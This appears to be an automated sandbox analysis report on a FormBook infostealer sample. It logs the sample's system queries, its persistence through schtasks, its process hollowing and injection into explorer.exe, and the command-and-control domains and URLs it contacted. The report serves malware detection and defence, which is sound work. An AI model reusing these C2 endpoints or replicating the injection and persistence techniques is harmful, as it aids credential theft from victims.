Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A01D6 GetUserNameW, 0_2_058A01D6
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A0A8E listen, 0_2_058A0A8E
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A0E9E bind, 0_2_058A0E9E
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A0A50 listen, 0_2_058A0A50
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A0E6B bind, 0_2_058A0E6B

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 403903
Sample: 08917506_by_Libranalysis
Startdate: 04/05/2021
Architecture: WINDOWS
Score: 100

Root node (2): DNS/IP info: www.arpinaindustriesllc.com; arpinaindustriesllc.com. Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures. Started process: 08917506_by_Libranalysis.exe 9 (node 11).

Process 08917506_by_Libranalysis.exe (node 11): Dropped files: C:\Users\user\AppData\Roaming\OfCxSfBf.exe (PE32); C:\Users\...\OfCxSfBf.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpFA9B.tmp (XML); C:\Users\...\08917506_by_Libranalysis.exe.log (ASCII). Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes. Started processes: 08917506_by_Libranalysis.exe (node 15); schtasks.exe 1 (node 18).

Process 08917506_by_Libranalysis.exe (node 15): Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection). Injected into: explorer.exe (node 20).

Process schtasks.exe (node 18): Started process: conhost.exe (node 24).

Process explorer.exe (node 20): DNS/IP info: genialnetero.com 162.241.62.33, 49727, 80 UNIFIEDLAYER-AS-1US United States; firstcoastelope.com 67.222.39.83, 49734, 80 UNIFIEDLAYER-AS-1US United States; 16 other IPs or domains. Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation; Uses ipconfig to lookup or modify the Windows network settings. Started process: ipconfig.exe (node 26).

Process ipconfig.exe (node 26): Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements. Started process: cmd.exe 1 (node 29).

Process cmd.exe (node 29): Started process: conhost.exe (node 31).
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country ASN ASN Name Malicious
185.231.69.84 www.joycasino-2020.club Ukraine 204601 ON-LINE-DATAServerlocation-NetherlandsDrontenNL true
192.0.78.24 sherylabrahamphotography.com United States 2635 AUTOMATTICUS true
206.189.46.186 www.thaihuay88.com United States 14061 DIGITALOCEAN-ASNUS true
199.192.27.68 www.cinmax.xyz United States 22612 NAMECHEAP-NETUS true
162.241.62.33 genialnetero.com United States 46606 UNIFIEDLAYER-AS-1US true
198.54.115.5 website-bazar.com United States 22612 NAMECHEAP-NETUS true
23.227.38.74 shops.myshopify.com Canada 13335 CLOUDFLARENETUS true
34.102.136.180 blueberry-intl.com United States 15169 GOOGLEUS false
67.222.39.83 firstcoastelope.com United States 46606 UNIFIEDLAYER-AS-1US true

Contacted Domains

Name IP Active
www.joycasino-2020.club 185.231.69.84 true
genialnetero.com 162.241.62.33 true
firstcoastelope.com 67.222.39.83 true
arpinaindustriesllc.com 162.0.232.119 true
www.cinmax.xyz 199.192.27.68 true
blueberry-intl.com 34.102.136.180 true
shops.myshopify.com 23.227.38.74 true
sherylabrahamphotography.com 192.0.78.24 true
www.thaihuay88.com 206.189.46.186 true
website-bazar.com 198.54.115.5 true
www.morumi.site unknown unknown
www.firstcoastelope.com unknown unknown
www.sherylabrahamphotography.com unknown unknown
www.recruit-japan-hcm.com unknown unknown
www.arpinaindustriesllc.com unknown unknown
www.genialnetero.com unknown unknown
www.evrbrite.com unknown unknown
www.website-bazar.com unknown unknown
www.marielivet.com unknown unknown
www.blueberry-intl.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.thaihuay88.com/o86d/?W6jDfD=Zr1mHD0UzvWCQcI2JlGAeokzkFEIblHMxqeZtw3W9dCQQ7exnTCb8lR/2qgknbIFYyB/eFrcFw==&Yn=ybdHh8KP02GTtb true Avira URL Cloud: safe unknown
http://www.marielivet.com/o86d/?W6jDfD=PL9u7p4v7hn5T83wCAG42BUGAPPNW4v8+s1TFKrmIVkrOUDjB/r4wvcv+gOAAG+Oa4qYtq3B7Q==&Yn=ybdHh8KP02GTtb true Avira URL Cloud: safe unknown
http://www.firstcoastelope.com/o86d/?W6jDfD=LOco70LpFY5umcR4dQY6Ck5isx6bsPxuRuPfG/JQuVwPWdFiKckkP6tLRm3hZqsbjizE9R3VWg==&Yn=ybdHh8KP02GTtb true Avira URL Cloud: safe unknown
http://www.cinmax.xyz/o86d/?W6jDfD=FLq1m09lMNVeUGxb2EGlpEcYOBglVjP6VclDGdRBVwR1mwk4Bp+oxJyzVgRWjmk7leVMWGvpeQ==&Yn=ybdHh8KP02GTtb true Avira URL Cloud: safe unknown
http://www.joycasino-2020.club/o86d/?W6jDfD=sTrQNZETbqohgMY0G3QDWOyfMZqAyHA57kuO1l/GbTBT7+5tNjLfMqbR0u4OJ3a+5b59BonIRA==&Yn=ybdHh8KP02GTtb true Avira URL Cloud: safe unknown
http://www.website-bazar.com/o86d/?W6jDfD=Zt5QD3TUSOnCkU7SKGg3ywaITg6vE6njEzv/4k+L08OvZwr0NYVY1MAp4q6WCjDapjCg57Vf4Q==&Yn=ybdHh8KP02GTtb true Avira URL Cloud: safe unknown
http://www.genialnetero.com/o86d/?W6jDfD=ciPSY9IHIiBMUeM+AHa6rnkVhX0NcoOlsc17DR+fEw9UxF+XyC1njkrt1st9cFa0q3XsiD0AOg==&Yn=ybdHh8KP02GTtb true Avira URL Cloud: safe unknown
www.evrbrite.com/o86d/ true Avira URL Cloud: safe low
http://www.blueberry-intl.com/o86d/?W6jDfD=lH+NNz2eaU5LSk/yemMXIWDwl3fMAuCKISb0DcDmH6anXfUVh7p155egYD4l1a4C4v8/cW+zhg==&Yn=ybdHh8KP02GTtb false Avira URL Cloud: safe unknown
http://www.sherylabrahamphotography.com/o86d/?W6jDfD=VzK2bv7yp5iwEBdNZQjCdXXbrLCot30MtbV4orBq8x4MF4HvmT9bEqgnu31MbrCbNdKakV5eJA==&Yn=ybdHh8KP02GTtb true Avira URL Cloud: safe unknown